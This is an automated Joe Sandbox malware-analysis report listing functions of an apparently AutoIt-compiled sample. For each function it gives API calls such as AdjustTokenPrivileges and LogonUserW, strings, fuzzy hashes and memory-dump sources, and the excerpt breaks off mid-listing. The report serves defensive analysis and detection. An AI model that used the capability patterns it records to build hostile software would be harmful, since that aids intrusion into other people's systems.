Opcode Fuzzy Hash: 5553f51f3e62d390dc890a1f8bbcf0f69b8084db9fcca30d3890a1fee236928c
Instruction Fuzzy Hash: 8BF03775A1130CBFDB00DFE49C89ABEBBB8EF08311F1044A9AA01E2181E6756A089B50

Function 00F64C7F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00F64CB3

Strings

DOWN, xrefs: 00F64C98

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: mouse_event
String ID: DOWN
API String ID: 2434400541-711622031
Opcode ID: 9970f0b563e2974f780605b64fee541a97cbf4b036392f036fa910437d2774ac
Instruction ID: a4341004e5feffa5ecb7e9b7506bcc612c6d94ac3e3e631f78b9357e58db4643
Opcode Fuzzy Hash: 9970f0b563e2974f780605b64fee541a97cbf4b036392f036fa910437d2774ac
Instruction Fuzzy Hash: DCE08C3229DB313CF9483919BD07EFB238C8B12331B250206F810E55C2EE847C8239B9

Function 00F6C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00F6C6FB
FindClose.KERNEL32(00000000), ref: 00F6C72B

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: a8eaefb1cec0ce17112a3272dea42cb9726cb2dcae1f1863f355c7cd4c46cae8
Instruction ID: 669456c93d94e6fe60c18b4dd3542f97972a601da651717785ad8698c02861bc
Opcode Fuzzy Hash: a8eaefb1cec0ce17112a3272dea42cb9726cb2dcae1f1863f355c7cd4c46cae8
Instruction Fuzzy Hash: 26118E726042049FDB10DF29CC45A6AF7E8EF85324F44C51DF9A9C7391DB74A805EB81

Function 00F6A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00F79468,?,00F8FB84,?), ref: 00F6A097
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00F79468,?,00F8FB84,?), ref: 00F6A0A9

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 40feae16558528099d20545566dd48a8653d4c2371d21ebd1f2b4867c83b3d75
Instruction ID: fb7b6522a3c69ddaa61230a596b40fa674d8f4c0d911945c3f52522566a44fdd
Opcode Fuzzy Hash: 40feae16558528099d20545566dd48a8653d4c2371d21ebd1f2b4867c83b3d75
Instruction Fuzzy Hash: C8F0823651522DBBDB21AFA4CC48FEA776DBF08361F004165F909D6181DA309944EBA1

Function 00F581CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F58309), ref: 00F581E0
CloseHandle.KERNEL32(?,?,00F58309), ref: 00F581F2

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 80b95585c4a17e73877903d292b234f0f35ee85549e868b46ff569cf0b036286
Instruction ID: 526ed791729a08bf31951469ec3013a58217b0ef926276ab35db44fcf1ae5597
Opcode Fuzzy Hash: 80b95585c4a17e73877903d292b234f0f35ee85549e868b46ff569cf0b036286
Instruction Fuzzy Hash: CCE0E672010911AFE7252B60FC05D777BE9EF04351715882DF955C4471DB615C95EB10

Function 00F2A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00F28D57,?,?,?,00000001), ref: 00F2A15A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00F2A163

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 6fd2d5e14cfe4ee8919ec2172dfd2d0b19234aa62966ab103da46f9760dab0ff
Instruction ID: 72ae1cbdcd04d6263e6e087ae247b2aeb1574f8f1d384763512848cf1f231635
Opcode Fuzzy Hash: 6fd2d5e14cfe4ee8919ec2172dfd2d0b19234aa62966ab103da46f9760dab0ff
Instruction Fuzzy Hash: DEB0923125430CAFCA002B91EC0DBE83F68EB46AA2F404020F60D84060CB625454AB91

Function 00F0E6A0 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 00F43E62

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: 9bd3ef6a69f3386cb044273d0501a991f8797a22774e49e0c31977d909b325d3
Instruction ID: bb601820825d6ee9c060cace11a3c4bcc768a585511b58ebb79d445bbafed286
Opcode Fuzzy Hash: 9bd3ef6a69f3386cb044273d0501a991f8797a22774e49e0c31977d909b325d3
Instruction Fuzzy Hash: 88A2AD75E04209CFCB24CF54C880AAAB7B1FF58324F648869E915AB391D775ED42FB90

Function 00F2F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2320d09debb1a45782e45f8458214d6c1bb63beeb748b7a8b41b739c1eb94955
Instruction ID: 44eca18aa25932f256d7e6987ded753b7425f56e1a850980a1bc6417285a3409
Opcode Fuzzy Hash: 2320d09debb1a45782e45f8458214d6c1bb63beeb748b7a8b41b739c1eb94955
Instruction Fuzzy Hash: 0732F222D39F154DD723AA34DC72336A258AFB73D4F15D737E81AB59A9EB28C4836100

Function 00F3242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d99d38b2496105061ed5e48d25eb6713dcc04d22f11cf8a211d348e5ebec33
Instruction ID: fc5ea4093781dd4ff3d32a5e21a55c91dbf0491042b6bc03250318f087ef72a9
Opcode Fuzzy Hash: a3d99d38b2496105061ed5e48d25eb6713dcc04d22f11cf8a211d348e5ebec33
Instruction Fuzzy Hash: FDB1DF30D2AF454DD62397398831336B65CAFBB2D5F51D71BFC2674D22EB2285836181

Function 00F68889 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 00F6889B

Part of subcall function 00F2520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00F68F6E,00000000,?,?,?,?,00F6911F,00000000,?), ref: 00F25213
Part of subcall function 00F2520A: __aulldiv.LIBCMT ref: 00F25233

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: 701e0b95adbf5182e2a278a8793799c316ca43278b7b31f3c4a3ad8a10e441f9
Instruction ID: 373752d5f017ec714a0a90237174fc48f3cd4b2c001546d97f82691e9e88ee7f
Opcode Fuzzy Hash: 701e0b95adbf5182e2a278a8793799c316ca43278b7b31f3c4a3ad8a10e441f9
Instruction Fuzzy Hash: 3E21AF32A356108BC729CF39D841A52B3E1EBA5321B688F6CD0F5CB2C0CA34A905EB54

Function 00F587B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00F58389), ref: 00F587D1

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 0bef6abfeb9c8b3089f3fe3836df558d6c6a502521b41f06a91e084471a57da4
Instruction ID: 2ea6c78a4e86eab450a2c385aba91aac799dab87588230bed2e1480a2950abaa
Opcode Fuzzy Hash: 0bef6abfeb9c8b3089f3fe3836df558d6c6a502521b41f06a91e084471a57da4
Instruction Fuzzy Hash: ACD09E3226450EAFEF019EA4DD05EFE3B69EB04B01F408511FE15D51A1C775D935AB60

Function 00F2A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 00F2A12A

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 85c66bce7b769c4f9c4ea38dbd27f6c5d2d30077c7e1069654fd7b9bd41e9856
Instruction ID: fcb639c40ccd47c38f5089546237dc154cba8e173aeab0b6cc0d02a8a6bbfdc9
Opcode Fuzzy Hash: 85c66bce7b769c4f9c4ea38dbd27f6c5d2d30077c7e1069654fd7b9bd41e9856
Instruction Fuzzy Hash: ADA0113000020CAB8A002B82EC088A8BFACEA022A0B008020F80C800228B32A820AA80

Function 00F18808 Relevance: .6, Instructions: 590COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23886e41c95e6d4676920e35f2b787701a7620a261b03db4a51d6ae5bbfe3d45
Instruction ID: 96fa6c699d582ae330593cd7749aebfa3a8ecf88065e86f4008a5a8962471c3a
Opcode Fuzzy Hash: 23886e41c95e6d4676920e35f2b787701a7620a261b03db4a51d6ae5bbfe3d45
Instruction Fuzzy Hash: 76224431D04546DBCF288B24C5A43BC7BA1BF017A5F68806ADA46CB492DB389DC7FB41

Function 00F221C5 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 82fa9de3945850695fceafc1c9ec124522e6b4ad7a0ef89a74e41f59f142be61
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: AFC1C8326050B34ADF6D8639E43413EFBA16EA27B135B076DD4B3CB1D5EE24C925E620

Function 00F225FA Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: d478da14c4f47d8eeec05da868886de81d1343e32e026e6556f4686b47f718d8
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 13C193336091B34ADF6D463AD43413EBAA16EA27B135B076DD4B2DB1D4EE20C925F620

Function 00F21978 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 4337ba8c1f6e432bb6bbf89cecac234aca6ed08ae4907e1d5a0d80cf7d6f35aa
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 18C1A1366450B349DF2D463AE43413EBAA17EB27B135B076DD4B3CB1C4EE20C965E624

Function 01948FB8 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2111882744.0000000001945000.00000040.00000020.00020000.00000000.sdmp, Offset: 01945000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1945000_EIvidclKOb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: 4a192b6a7a187f60e0e3a6bf26a8fdc11f619d7713a541d33987fa5e307c2215
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: 0641C171D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB80

Function 01948EA8 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2111882744.0000000001945000.00000040.00000020.00020000.00000000.sdmp, Offset: 01945000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1945000_EIvidclKOb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: faeeb2b231eb6d2d4425d401246f7ca9d5377f65ef2efe30235726f46fdf0475
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: BD018078A11109EFCB54DF98C590DAEF7B5FB88210F208599E809A7705D730AE51DB80

Function 01948E48 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2111882744.0000000001945000.00000040.00000020.00020000.00000000.sdmp, Offset: 01945000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1945000_EIvidclKOb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: cc4c2aa36f0f0eeb3f463ce443c01a75a8bc35a074e4792563ec302d3b35c019
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: 65014278A11109EFCB54EF98C590DAEF7B5FF88310F208599D819A7745D730AE41DB80

Function 01947808 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2111882744.0000000001945000.00000040.00000020.00020000.00000000.sdmp, Offset: 01945000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1945000_EIvidclKOb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 00F77806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00F7785B
DeleteObject.GDI32(00000000), ref: 00F7786D
DestroyWindow.USER32 ref: 00F7787B
GetDesktopWindow.USER32 ref: 00F77895
GetWindowRect.USER32(00000000), ref: 00F7789C
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00F779DD
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00F779ED
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F77A35
GetClientRect.USER32(00000000,?), ref: 00F77A41
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00F77A7B
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F77A9D
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F77AB0
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F77ABB
GlobalLock.KERNEL32(00000000), ref: 00F77AC4
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F77AD3
GlobalUnlock.KERNEL32(00000000), ref: 00F77ADC
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F77AE3
GlobalFree.KERNEL32(00000000), ref: 00F77AEE
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F77B00
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00F92CAC,00000000), ref: 00F77B16
GlobalFree.KERNEL32(00000000), ref: 00F77B26
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00F77B4C
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00F77B6B
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F77B8D
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F77D7A

Strings

AutoIt v3, xrefs: 00F77A2D
, xrefs: 00F77D00
DISPLAY, xrefs: 00F77BDD
static, xrefs: 00F77A75, 00F77BCC

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: deb7e79bb933cdf513fddb7ea161c4cdc907ca2947c6b79c39be4ff5902ea3c9
Instruction ID: 4005c9a0270e9f27cb4357b54f44f1731cb3e09f582f6670e34dd138be151a40
Opcode Fuzzy Hash: deb7e79bb933cdf513fddb7ea161c4cdc907ca2947c6b79c39be4ff5902ea3c9
Instruction Fuzzy Hash: 60029D71910209EFDB14EFA4CD89EAE7BB9EF48310F108159F905AB2A1D774AD01EB60

Function 00F8356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,00F8F910), ref: 00F83627
IsWindowVisible.USER32(?), ref: 00F8364B

Strings

GETCURRENTSELECTION, xrefs: 00F837E3
GETCURRENTCOL, xrefs: 00F83928
SETCURRENTSELECTION, xrefs: 00F837B6
ADDSTRING, xrefs: 00F83716
CHECK, xrefs: 00F8386D
TABLEFT, xrefs: 00F83687
CURRENTTAB, xrefs: 00F836BD
ISVISIBLE, xrefs: 00F83637
